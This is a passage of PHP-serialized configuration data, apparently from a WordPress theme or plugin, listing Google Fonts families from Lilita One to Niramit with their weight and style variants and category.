Savers\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"800\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Lilita One\";a:3:{s:5:\"label\";s:10:\"Lilita One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Lily Script One\";a:3:{s:5:\"label\";s:15:\"Lily Script One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Limelight\";a:3:{s:5:\"label\";s:9:\"Limelight\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Linden Hill\";a:3:{s:5:\"label\";s:11:\"Linden Hill\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Literata\";a:3:{s:5:\"label\";s:8:\"Literata\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Liu Jian Mao Cao\";a:3:{s:5:\"label\";s:16:\"Liu Jian Mao Cao\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Livvic\";a:3:{s:5:\"label\";s:6:\"Livvic\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Lobster\";a:3:{s:5:\"label\";s:7:\"Lobster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Lobster Two\";a:3:{s:5:\"label\";s:11:\"Lobster Two\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Londrina Outline\";a:3:{s:5:\"label\";s:16:\"Londrina Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Londrina Shadow\";a:3:{s:5:\"label\";s:15:\"Londrina Shadow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Londrina Sketch\";a:3:{s:5:\"label\";s:15:\"Londrina Sketch\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Londrina Solid\";a:3:{s:5:\"label\";s:14:\"Londrina Solid\";s:8:\"variants\";a:4:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"900\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Long Cang\";a:3:{s:5:\"label\";s:9:\"Long Cang\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Lora\";a:3:{s:5:\"label\";s:4:\"Lora\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:21:\"Love Ya Like A Sister\";a:3:{s:5:\"label\";s:21:\"Love Ya Like A Sister\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Loved by the King\";a:3:{s:5:\"label\";s:17:\"Loved by the King\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Lovers Quarrel\";a:3:{s:5:\"label\";s:14:\"Lovers Quarrel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Luckiest Guy\";a:3:{s:5:\"label\";s:12:\"Luckiest Guy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Lusitana\";a:3:{s:5:\"label\";s:8:\"Lusitana\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Lustria\";a:3:{s:5:\"label\";s:7:\"Lustria\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"M PLUS 1p\";a:3:{s:5:\"label\";s:9:\"M PLUS 1p\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"M PLUS Rounded 1c\";a:3:{s:5:\"label\";s:17:\"M PLUS Rounded 1c\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Ma Shan Zheng\";a:3:{s:5:\"label\";s:13:\"Ma Shan Zheng\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Macondo\";a:3:{s:5:\"label\";s:7:\"Macondo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:18:\"Macondo Swash Caps\";a:3:{s:5:\"label\";s:18:\"Macondo Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Mada\";a:3:{s:5:\"label\";s:4:\"Mada\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Magra\";a:3:{s:5:\"label\";s:5:\"Magra\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Maiden Orange\";a:3:{s:5:\"label\";s:13:\"Maiden Orange\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Maitree\";a:3:{s:5:\"label\";s:7:\"Maitree\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Major Mono Display\";a:3:{s:5:\"label\";s:18:\"Major Mono Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:4:\"Mako\";a:3:{s:5:\"label\";s:4:\"Mako\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Mali\";a:3:{s:5:\"label\";s:4:\"Mali\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Mallanna\";a:3:{s:5:\"label\";s:8:\"Mallanna\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Mandali\";a:3:{s:5:\"label\";s:7:\"Mandali\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Manjari\";a:3:{s:5:\"label\";s:7:\"Manjari\";s:8:\"variants\";a:3:{i:0;s:3:\"100\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Manrope\";a:3:{s:5:\"label\";s:7:\"Manrope\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Mansalva\";a:3:{s:5:\"label\";s:8:\"Mansalva\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Manuale\";a:3:{s:5:\"label\";s:7:\"Manuale\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Marcellus\";a:3:{s:5:\"label\";s:9:\"Marcellus\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Marcellus SC\";a:3:{s:5:\"label\";s:12:\"Marcellus SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Marck Script\";a:3:{s:5:\"label\";s:12:\"Marck Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Margarine\";a:3:{s:5:\"label\";s:9:\"Margarine\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Markazi Text\";a:3:{s:5:\"label\";s:12:\"Markazi Text\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Marko One\";a:3:{s:5:\"label\";s:9:\"Marko One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Marmelad\";a:3:{s:5:\"label\";s:8:\"Marmelad\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Martel\";a:3:{s:5:\"label\";s:6:\"Martel\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Martel Sans\";a:3:{s:5:\"label\";s:11:\"Martel Sans\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Marvel\";a:3:{s:5:\"label\";s:6:\"Marvel\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Mate\";a:3:{s:5:\"label\";s:4:\"Mate\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Mate SC\";a:3:{s:5:\"label\";s:7:\"Mate SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Maven Pro\";a:3:{s:5:\"label\";s:9:\"Maven Pro\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"McLaren\";a:3:{s:5:\"label\";s:7:\"McLaren\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Meddon\";a:3:{s:5:\"label\";s:6:\"Meddon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"MedievalSharp\";a:3:{s:5:\"label\";s:13:\"MedievalSharp\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Medula One\";a:3:{s:5:\"label\";s:10:\"Medula One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Meera Inimai\";a:3:{s:5:\"label\";s:12:\"Meera Inimai\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Megrim\";a:3:{s:5:\"label\";s:6:\"Megrim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Meie Script\";a:3:{s:5:\"label\";s:11:\"Meie Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Merienda\";a:3:{s:5:\"label\";s:8:\"Merienda\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Merienda One\";a:3:{s:5:\"label\";s:12:\"Merienda One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Merriweather\";a:3:{s:5:\"label\";s:12:\"Merriweather\";s:8:\"variants\";a:8:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Merriweather Sans\";a:3:{s:5:\"label\";s:17:\"Merriweather Sans\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Metal\";a:3:{s:5:\"label\";s:5:\"Metal\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Metal Mania\";a:3:{s:5:\"label\";s:11:\"Metal Mania\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Metamorphous\";a:3:{s:5:\"label\";s:12:\"Metamorphous\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Metrophobic\";a:3:{s:5:\"label\";s:11:\"Metrophobic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Michroma\";a:3:{s:5:\"label\";s:8:\"Michroma\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Milonga\";a:3:{s:5:\"label\";s:7:\"Milonga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Miltonian\";a:3:{s:5:\"label\";s:9:\"Miltonian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Miltonian Tattoo\";a:3:{s:5:\"label\";s:16:\"Miltonian Tattoo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Mina\";a:3:{s:5:\"label\";s:4:\"Mina\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Miniver\";a:3:{s:5:\"label\";s:7:\"Miniver\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Miriam Libre\";a:3:{s:5:\"label\";s:12:\"Miriam Libre\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Mirza\";a:3:{s:5:\"label\";s:5:\"Mirza\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Miss Fajardose\";a:3:{s:5:\"label\";s:14:\"Miss Fajardose\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Mitr\";a:3:{s:5:\"label\";s:4:\"Mitr\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Modak\";a:3:{s:5:\"label\";s:5:\"Modak\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Modern Antiqua\";a:3:{s:5:\"label\";s:14:\"Modern Antiqua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Mogra\";a:3:{s:5:\"label\";s:5:\"Mogra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Molengo\";a:3:{s:5:\"label\";s:7:\"Molengo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Molle\";a:3:{s:5:\"label\";s:5:\"Molle\";s:8:\"variants\";a:1:{i:0;s:6:\"italic\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Monda\";a:3:{s:5:\"label\";s:5:\"Monda\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Monofett\";a:3:{s:5:\"label\";s:8:\"Monofett\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Monoton\";a:3:{s:5:\"label\";s:7:\"Monoton\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:20:\"Monsieur La Doulaise\";a:3:{s:5:\"label\";s:20:\"Monsieur La Doulaise\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Montaga\";a:3:{s:5:\"label\";s:7:\"Montaga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Montez\";a:3:{s:5:\"label\";s:6:\"Montez\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Montserrat\";a:3:{s:5:\"label\";s:10:\"Montserrat\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Montserrat Alternates\";a:3:{s:5:\"label\";s:21:\"Montserrat Alternates\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Montserrat Subrayada\";a:3:{s:5:\"label\";s:20:\"Montserrat Subrayada\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Moul\";a:3:{s:5:\"label\";s:4:\"Moul\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Moulpali\";a:3:{s:5:\"label\";s:8:\"Moulpali\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:22:\"Mountains of Christmas\";a:3:{s:5:\"label\";s:22:\"Mountains of Christmas\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Mouse Memoirs\";a:3:{s:5:\"label\";s:13:\"Mouse Memoirs\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Mr Bedfort\";a:3:{s:5:\"label\";s:10:\"Mr Bedfort\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Mr Dafoe\";a:3:{s:5:\"label\";s:8:\"Mr Dafoe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Mr De Haviland\";a:3:{s:5:\"label\";s:14:\"Mr De Haviland\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:19:\"Mrs Saint Delafield\";a:3:{s:5:\"label\";s:19:\"Mrs Saint Delafield\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Mrs Sheppards\";a:3:{s:5:\"label\";s:13:\"Mrs Sheppards\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Mukta\";a:3:{s:5:\"label\";s:5:\"Mukta\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Mukta Mahee\";a:3:{s:5:\"label\";s:11:\"Mukta Mahee\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Mukta Malar\";a:3:{s:5:\"label\";s:11:\"Mukta Malar\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Mukta Vaani\";a:3:{s:5:\"label\";s:11:\"Mukta Vaani\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Mulish\";a:3:{s:5:\"label\";s:6:\"Mulish\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"MuseoModerno\";a:3:{s:5:\"label\";s:12:\"MuseoModerno\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Mystery Quest\";a:3:{s:5:\"label\";s:13:\"Mystery Quest\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:3:\"NTR\";a:3:{s:5:\"label\";s:3:\"NTR\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Nanum Brush Script\";a:3:{s:5:\"label\";s:18:\"Nanum Brush Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Nanum Gothic\";a:3:{s:5:\"label\";s:12:\"Nanum Gothic\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"800\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Nanum Gothic Coding\";a:3:{s:5:\"label\";s:19:\"Nanum Gothic Coding\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:14:\"Nanum Myeongjo\";a:3:{s:5:\"label\";s:14:\"Nanum Myeongjo\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"800\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Nanum Pen Script\";a:3:{s:5:\"label\";s:16:\"Nanum Pen Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Nerko One\";a:3:{s:5:\"label\";s:9:\"Nerko One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Neucha\";a:3:{s:5:\"label\";s:6:\"Neucha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Neuton\";a:3:{s:5:\"label\";s:6:\"Neuton\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"New Rocker\";a:3:{s:5:\"label\";s:10:\"New Rocker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"New Tegomin\";a:3:{s:5:\"label\";s:11:\"New Tegomin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"News Cycle\";a:3:{s:5:\"label\";s:10:\"News Cycle\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Newsreader\";a:3:{s:5:\"label\";s:10:\"Newsreader\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Niconne\";a:3:{s:5:\"label\";s:7:\"Niconne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Niramit\";a:3:{s:5:\"label\";s:7:\"Niramit\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-se